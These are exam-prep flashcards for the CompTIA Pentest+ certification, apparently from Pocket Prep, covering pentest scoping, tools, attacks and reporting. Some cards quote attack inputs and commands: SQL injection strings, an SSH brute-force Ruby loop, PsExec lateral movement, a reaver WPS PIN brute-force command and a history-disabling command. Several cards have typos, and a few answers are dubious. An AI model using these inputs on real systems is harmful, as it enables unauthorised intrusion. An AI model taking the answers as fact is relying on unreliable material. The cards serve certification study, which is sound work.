Pocket Prep CompTIA Pentest+ Flashcards
1
Q
Alex is writing a python script to test multiple credentials against a login page.
How would Alex loop the credential testing function?
A. user = user++
user.connect(target)
B. if user in creds:
connect (target,user)
C, user = creds
connect user, target
D.for user in creds:
connect(target,user)
A
D.for user in creds:
connect(target,user)
Explanation:
A simple method of iterating a list is the “for loop”.
The above code will run the “connect)target,user)” function for each user found in the “creds” array
2
Q
Which of the following describes the process of deconfliction?
A.A change management process for remediating vulnerabilities
B.A communication process of sorting out pentesters artifacts from real compromise
C.A risk assessment process
D.A vulnerability scanning process with limited impact
A
B.A communication process of sorting out pentesters artifacts from real compromise
Explanation:
Communication with the client provides the ability for deconfliction, which is the process of sorting out pentesters artifacts from real world compromise.
This limits the risk of the pentester becoming the scapegoat in case of business impact
3
Q
Alex is preparing for a pentest, but the client has a network access control in place that would prevent most, if not all, of Alex’s packets during testing.
What can be done to enable the testing?
A,.Devices behind the firewall can be execluded from the testing scope
B.Alex can test out of office hours
C.The client can disable the firewall
D.The client can make a security exception in the NAC
A
D.The client can make a security exception in the NAC
Explanation:
Sometimes a security exception at the network layer is needed to enable a pentester to complete their tests
4
Q
During reconnaissance, Ryan identified a service running on the remote host with an older version.
Where would Ryan look for an exploit for this version? A.Kali Linux website B.Exploit-DB Website C.SANS Website D.OWASP Website
A
B.Exploit-DB Website
Explanation:
Exploit DB is a huge database with extensive lists of exploits for many different kinds of software.
They maintain up-to-date lists of exploits and POCs for older and newer version of software
5
Q
Alex is asked to perform a pentest against a web application.
Part of her task involves software assurance.
She has identified 11 dynamic parameters on the web app that need testing.
Which method should she start with? A.Directory traversal B.Spear Phishing C.Fuzzing D.Code Injection
A
C.Fuzzing
Explanation:
In this type of testing Alex is evaluating how well a website or web application processes and filters-user supplied input.
Web fuzzing is a technique used to provide invalid or random data as inputs to form fields, URL parameters and so forth in an effort to elicit an error and an unintentional response that could identify a potential injection flaw
6
Q
In what situation would a goal re prioritization likely occur?
A.When a critical target is successfully exploited
B.When new systems are added to the environment
C.Every time the scope changes
D.If third-party malware or traces of compromise are found during testing
A
D.If third-party malware or traces of compromise are found during testing
Explanation:
During the pentest you may discover malware, malicious binaries, or services running on servers that neither you nor the client created.
These indicators of prior compromise should be brought to the clients attention immediately, because goal reprioritzation may be necessary to properly plan and address the new problem
7
Q
Where would a regular vulnerability can be mandated within an organization? A.In the legal disclaimers B.In the corporate policy C.In the corporate goals D.In a change management procedure
A
B.In the corporate policy
Explanation:
Even though it is not a regulatory requirement, many organizations mandate vulnerability scanning in their corporate policy
8
Q
Through reconnaissance, Alex has identified a group of top-ranking managers in his targeted organization.
His next move is to send all of them a specially crafted email that contains a malicious attachment in the form of an Excel financial report.
What type of attack is Alex using? A.Spear phishing B.XSS C.CSRF D.Whaling
A
D.Whaling
Explanation:
Whaling is a spoofed-email attack that is used to target members of an organization that have credentials and access to the types of resources that could cause catastrophic damage to a business if compromised
9
Q
Alex is preparing the remediation section of her report.
The issue in question is an authentication service open to the Internet.
This is at risk of brute-force attacks and Alex needs to address it.
Which suggestion would best fir the given situation?
A.Using cookies
B.Implementation of multifactor authentication methods
C.Changing the default service port to one less frequently used
D.Enabling PAM (Password Authentication Manager)
A
B.Implementation of multifactor authentication methods
Explanation:
Adding a pin from a third-party device or a private key along with password would apply an additional layer of security to the authentication mechanism
10
Q
During a pentest, Erik notices that the website manages sessions using session tokens.
However, he believes that those tokens could be a potential weakness and would like to test the entropy or weak attributes.
Witihn Burp Suite Pro, which plugin would be able to perform the analysis? A.Burp Decoder B.Burp Sequencer C.Burp Repeater D.Burp Intruder
A
B.Burp Sequencer
Explanation:
Burp Sequencer is a tool for analyzing the quality of randomness in a sample of data items.
You can use it to test an applications session tokens or other important data items that are intended to be unpredictable, such as anti-CSRF tokens, password reset tokens, etc.
Burp Intruder is a tool for automating customized attacks against web applications.
It is extremely powerful and configurable, and can be used to perform a huge range of tasks, from simple brute-force guessing of web directories through to active exploitation of complex blind SQL injection vulnerabilities
Burp Repeater is a simple tool for manually manipulating and reissuing individual HTTP Websocket messages and analyzing responses.
You can use Repeater for all kinds of purposes, such as changing parameter values to test for input-based vulnerabilities, issuing requests in a specific sequence to test for logic flaws and reissuing requests from Burp Scanner issues to manually verify reported issues
Burp Decoder is a simple tool for transforming encoded data into its canonical form, or for transforming raw data into various encoded and hashed forms.
It is capable of intelligently recognizing several encoding formats using heuristic techniques
11
Q
Jenny is performing a pentest and she managed to gain access to a Windows host.
What tool should she consider using in order to extract credentials from the Windows host? A.netcat B.Mimicatz C.PowerShell D.WMIC
A
B.Mimicatz
Explanation:
Mimikatz is a leading post-exploitation tool that dumps passwords from memory, as well as hashes, PINs and Kerberos tickets.
Other useful attacks it enables are pass-the-hash, pass-the-ticket or building Golden Kerberos tickets.
This makes post-exploitation lateral movement within a network easy for attackers.
Wrong Answers:
Netcat is a computer networking utility for reading and writing to network connections using TCP or UDP.
The command is designed to be a dependable back-end that can be used directly or easily driven by other programs and scripts.
The Windows Management Instrumentation Command line (WMIC) is a software utility that allows user to perform Windows Management Instrumentation (WMI) operations with a command prompt
PowerShell is a task automation and configuration management framework from Microsoft, consisting of a command-line shell and associated scripting language
12
Q
What is the downside of injection malicious code into a legitimate service using Meterpreter?
A.The malicious code is easily detected
B.The malicious code might be spotted by AV
C,The malicious code will likely not survive a reboot
D.It is impossible to control the malicious code once its injected into a legitimate service
A
C,The malicious code will likely not survive a reboot
Explanation:
Having the malicious code injected into a service (legitimate or not) would mean that the code would be ran from that services memory space, but it would not ensure persistence.
If the machine is rebooted, the service will be restarted, but the malicious code will not be executed
13
Q
When would be an appropriate time for system hardening to take place?
A.At the initial system setup
B.Before any pentest engagement
C.After every pentest that find critical vulnerabilities
D.When the system is initially deployed and on a regular basis after that
A
D.When the system is initially deployed and on a regular basis after that
Explanation:
Administrators should initially setup the host with system hardening in mind.
They should repeat this process on a periodic basis and configure the systems as business needs change
14
Q
What type of attack is the following request?
‘https://target.com/login.php?user=James&pass=test’or’1’=’1
A.Credentials brute-force
B.Cross-site scripting
C.Weak credentials attack
D.SQL Injection attack
A
D.SQL Injection attack
Explanation:
SQL Injection is a method where a malicious user can create a true statement using OR 1=1 and pass it in the username or password field of the HTML form page
15
Q
Alex is a about to conduct a pentest.
This client has informed her that a large percentage of their services are hosted in an AWS cloud.
What requirements would have to be fulfilled before Alex proceeds with the test?
A.A third-party authorization
B.The pentest should be declined due to the third party
C.An NDA with the third-party provider
D,A new pentest agreement with the third-party provider
A
A.A third-party authorization
Explanation:
In cases where a third-party provider is involved, additional authorization would be required by that particular provider
16
Q
Kayla is pentesting a web application.
She managed to find a search parameter and, after poking around, she got the following message from the server.
‘You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near “’”.
What kind of potential vulnerability has Kayla found?
A.Sensitivbe Data Exposure
B.Directory Traversal
C.Cross-Site Scripting (XSS)
D.SQL Injection
A
D.SQL Injection
Explanation:
A SQL Injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database.
It generally allows an attacker to view data that they are not normally able to retrieve.
This error message is usually generated by the SQL server, suggesting that the intial request did reach the SQL server and was executed.
However, due to the way the request was structured, the output produced an error.
It is likely that a properly structured SQL query will succeed in extracted data from the database.
Incorrect Answers:
Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites.
XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user.
Directory Traversal (also known as file path traversal) is a web security vulnerability that allows an attacker to read arbitrary files on the server that is running an application. This might include application code and data, credentials for back-end systems, and sensitive operating system files
Sensitive Data exposure differs from a data breach, in which an attacker accesses and steals information
17
Q
Patrick has gained access to a corporate WIFi network.
He is using Kali Linux and going to execute a man-in-the-middle attack.
Which of the following is his best choice to execute this attack? A.Nmap B.Ettercap C.Nikto D.Aircrack-ng
A
B.Ettercap
Explanation:
Ettercap is a free and open source network security tool for man-in-the-middle attacks on LAN.
It can be used for computer network protocol analysis and security auditing.
It runs on various UNix-like operating systems including Linux, Mac OS X, BSD and Solaris and on Microsoft Windows.
It features sniffing of live connections, content filtering on the fly and many other interesting tricks.
It supports active and passive dissection of many protocols and includes many features for the network and host analysis
18
Q
Your client needs to verify the successful implementation of limited network access and limited storage access for part of their environment.
What sort of assessment would that be? A.Compliance-driven assessment B. Goal-based assessment C.Vulnerability Scanning D.Black box assessment
A
A.Compliance-driven assessment
Explanation:
Limited network access and limited storage access are common conditions in PCI compliance, for example.
This usually applies to specific systems involved in transactions processing to other specific services
19
Q
In Burp Suite Pro, when you want to replay a request but change some of the parameters, which module will you use? A.Extender B.Sequencer C.Scanner D.Repeater
A
D.Repeater
Explanation:
Using the Repeater, you can replay any specific request and be able to change all of its properties as well as the type of the request:
GET/POST, etc.
The Extender is used to add extensions to your Burp setup
Burp Sequencer is a tool for analyzing the quality of randomness in a same of data items
Burp Scanner is a tool for performing automated scans of web sites
20
Q
John is listing out his findings in the pentest report.
For each finding, John has provided in the following:
Finding ID, Vulnerability, Risk Rating, Remediation, Reference
A.Source
B.Exploit
C.Impact
D.Results
A
C.Impact
Explanation:
For each finding, the pentest report should also include the impact of it,
This could include the criticality level (low, medium, high and critical)
21
Q
Which of the following is mandatory for a compliance scan?
A.Involve a compliance officer
B.Scan all registered ports
C.Test the environment against the security standards
D.Sign an NDA
A
C.Test the environment against the security standards
Explanation:
Compliance-based assessments audit an organizations ability to follow and implement a given set of security standards in an environment.
Many industry standards affect and regulate the way sensitive data may be protected, stored and processed within an information system
22
Q
Apart from criticality of the impacted system, what other measures should be considered when prioritizing mitigation actions?
A.Whether a POC is available for free on the internet
B.OS of the vulnerable system
C.Difficulty of remediating the vulnerability
D.How long it takes to exploit the vulnerability
A
C.Difficulty of remediating the vulnerability
Explanation:
If fixing a vulnerability will require a very large commitment of human or financial resources, that needs to be considered when prioritizing mitigation steps
23
Q
George went through the following path of exploitation to successfully gain access to a targeted host:
He initially scanned the host, found a vulnerable DB service leaking some credential information and used those creds to authenticate to the DB.
Using the DB access, he managed to create a backdoor on the system and finally obtained access to it.
What is this string of attacks called? A.Exploit Chaining B.Black Box Testing C.White Box Testing D.Vulnerability Scanning
A
A.Exploit Chaining
Explanation:
Exploit chaining is the process of using multiple exploit methods and techniques in a sequence in order to successfully exploit the host
24
Q
While testing, Rob was able to exploit a SQL Injection on the clients website.
He was able to generate a POC,
Should Rob inform the client of the vulnerability at this stage, or should he wait and present it in the final report?
A.All findings are listed in the final report, there is no need to contact the client during the testing
B.SQL Injection is not critical enough to be communicated to the customer before the final report
C. Its a good practice to communicate critical findings in a timely manner; Rob should contact his client and share his finding
D.All findings, large or small should be reported as soon as they are identified
A
C. Its a good practice to communicate critical findings in a timely manner; Rob should contact his client and share his finding
Explanation:
High criticality findings are usually reported to the client the moment they are discovered.
The client might need to take some action or provide some guidance on future tests on those vulnerabilities
Findings with low, medium or informational classification are usually only reported in the final report.
Those would not require immediate response from the client
25
```
How would you classify a vulnerability found on a Linux machine associated with Microsoft Remote Desktop service?
A.Critical
B.Informational
C.False-Negative
D.False-Positive
```
D.False-Positive
Explanation:
Non-credentialed vulnerability scans can produce a fair share of false positives and may provide little to no verification of discovered vulnerabilities.
Microsoft Remote Desktop service could not be ran on a Linux machine thus suggesting that the vulnerability is a false positive and not exploitable
26
In what way could Alex potentially exploit an FTP service with allowed Anonymouse access?
A.User her Anonymouse account to upload malicious code or tools for remote code execution
B.User her Anonymouse account to log into the FTP server host on a shell terminal
C.Use her Anonymouse account to enumerate users
D.User her Anonymouse account to download restricted data from the FTP site
A.User her Anonymouse account to upload malicious code or tools for remote code execution
Explanation:
The reason for anonymouse access is to allow public, untrusted users to download files from a restricted environment.
However, misconfigurations with directory permissions could allow arbitrary files/directories to be uploaded and lead to remote code execution
27
You are tasked with a compliance-based pentest.
The clients key management solution is hosted on a third-party vendor.
How could this affect the pentest?
A.The client will have to arrange local key management in order to fulfill the compliance requirements
B.The pentestd scope might have to exclude key management from testing, as it falls outside of the clients environment
C.The third-party service provider needs to request an additional pentest and pass the compliance requirements
D.The pentests scope might have to include the third partys policies and practices regarding key management
D.The pentests scope might have to include the third partys policies and practices regarding key management
Explanation:
Depending on the third-party provider, the scope of the test might have to be increased to cover the additional policies and practices.
Some key management service providers do not have the certification needed to fulfill the compliance requirements, in which case the pentestes scope would not need to be increased
28
During information gathering, Erika is attempting to complete a successful zone transfer request.
```
Out of her arsenal of tools, which one would allow her to complete this?
A.Nmap
B.Ping
C.net use
D.Telnet
```
A.Nmap
Explanation:
Nmap, a free open-source scanner, is used ti discover hsots and services on a computer network by sending packets and analyzing the responses.
Nmap provides a number of features for proving computer networks, including host discovery and service and OS detection.
Nmaps capabilities are enhanced by the NSE scripts.
Nmap can be utilized with the "dns-zone-transfer.nse' script to complete a successful zone transfer request
29
```
What sort of attack is the jamming attack?
A.Denial of service against Wi-Fi
B. Social Engineering Attack
C.VoIP Attack
D.Web Application Attack
```
A.Denial of service against Wi-Fi
Explanation:
The goal if jamming is to overwhelm the good signal.
The targeted victim would not be able to connect and thus the service would be disrupted
30
```
When planning a pentest, one of the most important things that needs to be considered is?
A. Number of VLANs in the environment
B.Pentesting tools
C.Firewall rules
D.Target selection
```
D.Target selection
Explanation:
Selecting the targets to include in the engagement is crucial, as the organization may have many assets (people, processes, facilities, and technologies) located throughout the world that need to be considered during the target selection process
31
George is reviewing a vulnerability scan report.
He notices a critical vulnerability on a Linux host, but the vulnerability is related to a Windows-only service.
```
How should George categorize this finding?
A.False negative
B.True positive
C.True negative
D.False positive
```
D.False positive
Explanation:
False positive means that the positive finding is false
False negative would mean that even though something is reported "not vulnerable" it is vulnerable
True positive means that a vulnerability is in fact vulnerable
True negative would mean that a lack of vulnerability is in fact correct
32
When planning a penetration test, the client informs the testing company a specific type of data that falls under national export restrictions.
What does that mean for the pentesters?
A.It means this data is out of the pentests scope
B.It means that a nondisclosure agreement should be signed
C.It means the data is a high-value target
D.It prohibits the testing company from exporting this data to restricted countries
D.It prohibits the testing company from exporting this data to restricted countries
Explanation:
Export restrictions apply to services, technology or data
National export restrictions would mean that the given services, data or technology should not leave the country
33
What sort of exploitation technique can be used with the following command:
'.\PsExec.exe -u administrator -p secure \\dc01 cmd'
A.Lateral movement
B.Credential dumping
C.Pass the hash technique
D.Host discovery
A.Lateral movement
Explanation:
PsExec is a legitimate tool, often used by Windows Administrators to perform remote tasks.
It is also widely known among penetration testers and malicious attackers, as it provides perfect grounds for lateral movement in a targeted environment
34
What is SMB?
A.A tool in Kali Linux
B.A protocol that allows remote command execution
C.A protocol for remote access in Windows
D.A file sharing protocol
D.A file sharing protocol
Explanation:
SMB stands for Server Message Block..
This protocol allows sharing of files between Windows-based systems within the same network
35
In the mitigation section of his report, James suggests that the client enforce a strong password policy and high complexity.
Passwords should be changed often and shared with as few people as possible.
```
What vulnerability is he addressing is he addressing with this suggestion?
A.Shared admin password
B.Cross-site Request Forgery
C.Password in cleartext
D.SQL Injection
```
A.Shared admin password
Explanation:
Organizations should randomize the passwords of admin accounts, making them strong, complex passwords that are unique on each system
They may then use a password management tool to track all of these passwords
36
```
John is starting a penetration test; which opf the following tools can he use to gather intel passively?
A.Nmap
B.Burp Suite
C.theHarvester
D.OWASP ZAP
```
C.theHarvester
Explanation:
The tool is designed to scan databases and structure the results.
Nmap is a port/service scanner
Burp Suite and OWASP ZAP are proxy software, not OSINT tools
37
Analyze the Ruby code below. What purpose does it serve?
File.foreach(wordlistfile).with_index do |line, idx|
pass= line.chomp
print "\rTrying password number #{idx} : #{pass}"
begin
result1 = Net::SSH.start(target,
user,
:password => pass,
:auth_methods => ["password"].
:number_of_password_prompts => 0
)
rescue Net::SSH::AuthenticationFailed => auth
else
abort "\nThe password is #{pass}"
end
end
A.Remote control script
B.SSH Brute-forcing
C.Password changing script
D.Pass-the-hash script
B.SSH Brute-forcing
Explanation:
Ruby is a general purpose programming language commonly used by pentesters to create usable code.
As a programming language, Ruby differes from Bash and PowerShell in its flexibility and usefullness.
The script above shows a standard look that goes through a list of passwords and attempts to authenticate a user with each of them.
Upon success, it will print out the correct password.
This process is called brute-forcing
38
```
What method is used in Linux and macOS to help mitigate the possibility of a malicious user removing files from within a directory with another trusted user account?
A.Sticky bit
B.sudo
C.PAM for Unix
D.AC tables
```
A.Sticky bit
Explanation:
A sticky bit is a permission but, like a setuid or setgid bit, but it is set on a directory that allows only the owner of the file within the directory to delete or rename the file
An example of a directory with the sticky bit set would be /tmp in Linux and macOS
39
George has submitted his pentest report and received acceptance of the results from the client.
To conclude the penetration testing, what else is required of George?
A.Nothing; George is completely done with this pentest and all activities related to it
B.George should conduct to a post-engagement cleanup
C.George should stop all running scans and tests
D.George should start retesting the environment
B.George should conduct to a post-engagement cleanup
Explanation:
He should removal all tools, accounts and other traces of his work from the clients environment
40
```
What type of assessment is a password policy assessment?
A.White box
B.Compliance-based
C.Red team
D.Black box
```
B.Compliance-based
Explanation:
Compliance-based assessments usually verify the company's ability to enforce specific security policies, for example, minimum password strength or minimum encryption strength on data in transit or at rest
41
A rainbow table is best described as:
A.A dynamically generated table or a list of values based on predefined criteria
B.A Windows password hashes table
C.A database table of a Postgre server
D.A precomputed list or a table of all possible hash values
D.A precomputed list or a table of all possible hash values
Explanation:
Rainbow tables are prehashed values and because of this they tend to grow in size and require more storage
42
By determining the risk appetite of the client, what is James attempting to find out?
A.How much risk the client is ready to tolerate to achieve their goals
B.The security posture of the client
C.What type of engagement should be conducted
D.Whether the company has been successfully hacked before
A.How much risk the client is ready to tolerate to achieve their goals
Explanation:
Every organization has its own level of risk appetite, which is how much risk the organization is willing to tolerate to achieve its goals.
In the case of pentesting, the organization may apply some tight constraints on how their internal environment is accessed, how sensitive data is being handled and who is allowed to conduct the testing
43
```
Common Weakness and Enumeration (CWE) is maintained and published by which of the following?
A.OWASP
B.MITRE
C.CAPEC
D.SANS
```
B.MITRE
Explanation:
Common Weakness Enumeration is a community developed list of common software and hardware security weaknesses.
It is published and maintained by the MITRE Corp
44
Richard is using aircrack-ng suite against the clients wireless network.
He is at the point where he needs to start capturing packets.
```
Which tool of the aircrack-ng suite should Richard use?
A.airodump-ng
B.airmon-ng
C.None of these
D.airplay-ng
```
A.airodump-ng
Explanation:
Aircrack-ng is a network software suite consisting of a detector, packet sniffer, WEP and WPA/WPA2-PSK cracker and analysis tool for 802.11 wireless LANs.
It works with any wireless network interface controller whose driver supports raw monitoring mode and can sniff 802.11a, 802.11b and 802.11g traffic.
Airodump-ng is used for packet capturing of raw 802.11 frames.
It is ideal for collection WEP IVs for use with aircrack-ng.
If you have a GPS receiver connected to the computer, airodump-ng can log the coordinates of the discovered access points.
Airmon-ng is used to enable and disable monitor mode on wireless interfaces.
It may also be used to go back from monitor mode to managed mode.
Aireplay-ng is included in the aircrack-ng package and is used to inject wireless frames.
Its main role is to generate traffic for later use in aircrack-ng for cracking WEP and WPA-PSK keys.
Aireplay-ng has many attacks that can de-authenticate wireless clients for the purpose of captuiring WPA handshake data, fake authentications, interactive packet replay, hand-crafted ARP request injection and ARP-request re-injection
45
Company XYZ has accepted the pentest report created by George and requested all other copies of it to be properly disposed of.
Can George keep his personal copy of the report for his own reference?
A.No; the data in the report is the property of the client.
B.Yes; as long as he keeps it only for his personal reference
C.Penetester reports are always stored by the penetration company or the consultant that produces the pentest for a period of six months after test completion for legal reasons
D.Yes, the report was created by George and he is the owner of the document
A.No; the data in the report is the property of the client.
Explanation:
The information in the report is owned by the client.
Upon request, the pentester should destroy all of the data collected during testing, including his copy of the pentest report
46
Jack is attempting to enter a high-security area on the clients premises.
There is no security guard, but the automated door is controlled by RFID on the outside and a motion sensor on the inside.
Clearly, the aim is to prevent people from entering and to enable easy exit.
Jack is using a single sheet of paper, which he pushes through the small gap between the door and the root.
The paper sheet triggers the motion sensor and the door opens.
```
Which security mechanism has Jack exploited?
A.Jack used the tailgating technique
B.The emergency exit
C.The RFID sensor
D.The egress sensor
```
D.The egress sensor
Explanation:
The egress sensor is the motion detector that enables easy exit
47
```
WHich of the following tools could be used for making automatic scans and setting automatic updates?
A.Nmap
B.Burp Suite
C.Metasploit
D.Nessus
```
D.Nessus
Explanation:
Nessus is a scanning tool that can automate the enumeration process and be left in the background to collect information
Incorrect answers:
Burp Suite is a set of tools used for manual information-gathering. It allows manual testers to intercept all request and responses between the browser and the target application, even when HTTPS is being used
Nmap is an open-source network scanner that discovers hosts and servers manually
Metasploit is a framework that is best known for its automation in making attacks and creating shells on a victims machine
48
During the pentest, Robert was able to successfully exploit SQL injection vulnerability on the clients website.
When dumping the database, he noticed that all passwords were stored in clear text.
He then used the credentials from the database and attempted to authenticate against other clients asset.
EVentually he managed to gain shell access to one of the file share servers.
What mitigation should Robert suggest to the client based on the above results?
A.Change website technology to NoSQL
B.Train users to use more complex passwords
C.Always store passwords in an encrypted state
D.Prevent external logging with a firewall
C.Always store passwords in an encrypted state
Explanation:
Regardless of the technology and platform, passwords should always be stored in an encrypted state.
There is always the danger of compromising the host when passwords are stored in plain text.
49
What could be the result when a program writes more data to a buffer located on the stack than what is actually allocated for that buffer?
A.The allocated stack size will be increased dynamically
B.None of these
C>Corruption of adjacent data on the stack
D.Overfilling a buffer on the heap
C>Corruption of adjacent data on the stack
Explanation:
A stack buffer overflow or stack buffer overrun occurs when a program writes to a memory address on the programs call stack outside of the intended data structure, which is usually a fixed-length buffer.
Stack buffer overflow bugs are caused when a program writes more data to a buffer located on the stack than what is actually allocated for that buffer/
This almost always results in corruption of adjacent data on the stack, and in cases where the overflow was triggered by mistake, will often cause the program to crash or operate incorrectly.
Stack buffer overflow is a type of the more general programming malfunction known as buffer overflow (or buffer overrun)
Overfilling a buffer on the stack is more likely to derail program execution than overfilling a buffer on the heap because the stack contains the return addresses for all active function calls
A stack buffer overflow can be cause deliberately as part of an attack known as stack smashing.
If the affected program is running with special privileges, or accepts data from untrusted network hosts then the bug is a potential security vulnerability.
If the stack buffer is filled with data supplied from an untrusted user then that user can corrupt the stack in such a way as to inject executable code into the running program and take control of the process.
This is one of the oldest and more reliable methods for attackers to gain unauthorized access to a computer
50
Alex is using a reporting tool that can take input in XML format and produce a natively converted report in HTML.
```
What flag in an XML format ready to be imported into the reporting tool?
A.--output=html
B.--report=xml
C.-oX
D.-xml
```
C.-oX
Explanation:
-oX will instruct Nmap to produce the final results in XML format
Other options:
-oN = Normal output
- oG = grepable format
- oA = output the results in all formats
51
WHich of the following is the most important reason for the need for good and clear communication between the client and the penteser during the pentest engagement?
A.Situational awareness
B.Exchange of penetesting ideas and approaches
C.Regular updates on current status and progress
D.Quick response to changes in the scope
A.Situational awareness
Explanation:
For pentesters to ensure that they are in line with the pentests scope and the clients expectations, it is essential that they keep clear and open channels of communication.
Such communication is useful to provide situational awareness by keeping the pentesters informed of any changes in the clients environment.
For example, if the client needs to make changes to increase their productivity, pentesters should be made aware so that testing does not interfere with the clients business activities
52
What is the CVSS used for?
A. To describe a vulnerability
B.To determine the impact of a vulnerability
C.As a web pentest tool
D.As an exploit database
B.To determine the impact of a vulnerability
Explanation:
CVSS stands for Common Vulnerability Scoring Syste,
This system is used to provide metrics that can be used to determine the impact of a vulnerability to the environment of the organization.
Things that are considered when assigning a CVSS score are: exploitation difficulty, impact on data integrity etc.
53
What is a honeypot in IT security?
A.A security tool for debuting of malicious code
B>A pentesting tool
C.A social engineering technique
D.A method of deception used by security teams
D.A method of deception used by security teams
Explanation:
Honeypots are systems that can be found in the targeted organizations environment that appear to be vulnerable and thus are usually targted by malicious attackers.
However, they are simply a method of deception with the goal of distracting attackers from the real target
54
Using "wash", George has identified WPS-enabled networks.
He is attempting to exploit the WPS vulnerability associated with some old APs and brute force the WPS PIN.
```
Which command will he use?
A.wpshack -wlan0 --host HackMe
B.Airodump-ng -i wlan0 --wps -b HackMe
C.Aircrack-ng -i wlan0 -c 11 --ap HackMe
D.reaver -i wlan0 -b HackMe -c 11 -K 1
```
D.reaver -i wlan0 -b HackMe -c 11 -K 1
Explanation:
The command options include the following:
- i Your wireless interface name
- b MAC of the target AP
- c Channel to camp on
- K Execute pixie dust attack (brute-force WPS PIN)
55
James has completed the pentest engagement, but because some of the applications were still in development stage, he was unable to properly test them.
How could he BEST address the issue?
A.He could test the development environment as a gesture of goodwill
B.He could use the conclusion section to suggest future tests of previously excluded items
C.He could prepare a new pentest offer and send it to the client with the pentest report
D.He could mention this issue in a face-to-face meeting with the client
B.He could use the conclusion section to suggest future tests of previously excluded items
Explanation:
The conclusion section is where such information should be included.
For example, if your pentest scope excluded web application testing, you might recommend conducting that testing in a future engagement
56
```
Parameterized queries are usually remediation for what type of vulnerability?
A.DNS Zone Transfer
B.CSRF
C.Man-in-the-Middle
D.SQL Injection
```
D.SQL Injection
Explanation:
Input validation and parameterized queries are the usual remediation for SQL Injection vulnerabilities.
ANy unnecessary open services should be closed as part of system-hardening activities
57
James is involved in a pentest, and the client would like to add his IP address to the IPS whitelist.
```
What sort of engagement will it likely be?
A.Grey box
B.APT
C.White box
D.Red team
```
C.White box
Explanation:
Usually in a white box engagement, the pentester is allowed through the firewall and other preventive measures
58
Through threat modeling, the client determines that their main concern is persistent attackers using complex attacking techniques and models.
```
Which sort of threat actor is the organization most worried about?
A.Insider Threat
B.Pentester
C.APT
D.HAcktivist
```
C.APT
Explanation:
The advanced persistent threat (APT) is a type of threat actor motivated to steal sensitive information from high-profile targets using sophisticated hacking capabilities
59
```
Which of the following is a fairly easy and underestimated attack vector?
A.Wi-Fi Password Cracking
B.Insider Threats
C.Phishing Emails
D.Zero-Day exploits
```
C.Phishing Emails
Explanation:
Phishing attacks target sensitive information like passwords, usernames or credit card information.
While most phishing is done via email, there are many related attacks that can be categorized as types of phishing
WiFi password cracking requires physical access to the location, and besides that there is a whole exploitation chain associated with that attack
Zerp-day exploits are very hard to find and usually not available to the public
INsider threats are not exactly pentest-related and would require a rogue employee
60
During a web penetration test, Sara identified a user input field and attempted the following input:
"test; SELECT Username,Password FROM Users;--"
```
What is Sara testing for?
A.Directory Traversal
B.Remote Code Execution (RCE)
C.SQL Injection
D.Code Injection
```
C.SQL Injection
Explanation:
"test; SELECT Username,Password FROM Users;--"
is a SQL query and, if not validated properly, would be executed by the server.
Even if the query is incorrect, a vulnerable server would return and SQL error, thus suggesting that the query in fact reached the DB server
61
```
WHat combination of tools could ALex use to obtain an administrators password from a domain controller once he has access to it?
A.Nessus and Burp
B.Mimikatz and John The RIpper
C.SQLmap and Mewl
D.SET and Burp
```
B.Mimikatz and John The RIpper
Explanation:
Mimikatz is good for obtaining password hash files and databases such as Windows SAM database,
While Mimikatz could also attempt to crack the passwords, John the Ripper is specifically focused on password cracking using a file with stored passwords.
In combination, both tools complement each other
62
George suspects that he has managed to comrpomise a virtual Windows machine during his penetesting actions.
What method could he use to determine whether the machine is in fact virtual or physical?
A.Check the network adapter drivers to determine if its a VM interface
B.Check the Windows version and determine if its associated with virtualization
C.Run the "wmic baseboard get manufacturer, product" command
D.Check the network configuration and look for a VMnet identifier
C.Run the "wmic baseboard get manufacturer, product" command
Explanation:
This command provides the manufactuer and the product name of the machines motherboard.
On a virtual machine, this command would output the virtualization platform
63
The following code is an excerpt of what type of attack?
A.PHP Web SHell
B.Cross-site scripting
C.PHP System function
D.HTML Code Injection
A.PHP Web SHell
Explanation:
Web servers that support various web scripting languages such as PHP can easily fall victim to backdoor shells.
Controlling access to where files are uploaded and controlling supported file types are ways to mitigate against this type of vulnerability.
A simple PHP one-liner is sometimes all you need
64
What remediation method could be suggested in the following scenario?
On a client's host the following services are found to be running:
port service
22 SSH
23 Telnet
25 SMTP
80 HTTP
443 HTTPS
Upon checking with the client, Alex is informed that they haven't used telnet for years.
A.Institute a regular user password changing policy
B.Change the telnet port to one less frequently used
C.Close all unused ports and disable all unused services
D.Use two-factor authentication for telnet login
C.Close all unused ports and disable all unused services
Explanation:
One of the best and in fact mandatory ways to improve the security state of a system or even of an environment is to make sure there are no running services or open ports that are not being used
65
Which of the following could be considered an indicator of a previous compromise and would be a reason to urgently notify the client?
A.Traces of the psexec command in the event logs
B.A cron job running a file from the /tmp folder
C.Multiple user accounts on the system
D.The presence of Sysinternal tools in the home folder of the admin
B.A cron job running a file from the /tmp folder
Explanation:
Such a cron job is usually associated with a malicious file being executed from the /tmp folder.
This indicator of prior compromise should be brought to the attention of the customer immediately
Having multiple user accounts is fairly common and likely benign
Use of the psexec command could be related to legitimate admin work
Sysinternal tools are quite often used by Windows admins
66
Which of the following is specific to testing of POS systems?
A.They are prone to DOS attack vulnerabilities
B.They are usually more secure and require extensive testing
C.They need to be PCI DSS compliant
D.The tester needs to sign an NDA
C.They need to be PCI DSS compliant
Explanation:
POS (Point of Sale) systems involved in credit and debit card transactions must comply with the Payment Card Industry Data Security Standard (PCI DSS), which outlines strict, specific rules for all the handling of credit card information and the security of devices involved in those transactions
67
George has gained SSH access to a Linux host.
The first command he types in is:
'set +o history'
Why would George start with this command?
A.To check the previous commands and look for passwords
B.To prevent his next commands from being recorded
C.To elevate privileges
D.To enable persistence
B.To prevent his next commands from being recorded
Explanation:
Both Linux and Mac OS keep track of the commands user type in the terminal.
The BASH shell will record keystrokes in the $HOME/.bash_history file.
During a pentest, once you obtain access to a Unix/Linux/Mac operating system, it is a best practice to unset the history file to prevent the user/administrator from known what commands you are executing, as well as not commingling your dirty/malicious commands with a users history
68
What will the following command achieve when executed on a machine member of the AMS domain?
'net group /AMS'
A.List users of the AMS group
B.List groups on the AMS domain
C.List domains of the AMS group
D.Add AMS to the group
B.List groups on the AMS domain
Explanation:
Exploring Windows domains will be a lot easier if you are familiar with the Windows net commands
69
Select which two tools are used during the reconnaissance phase of a pentest
A.Shodan, aircrack-ng
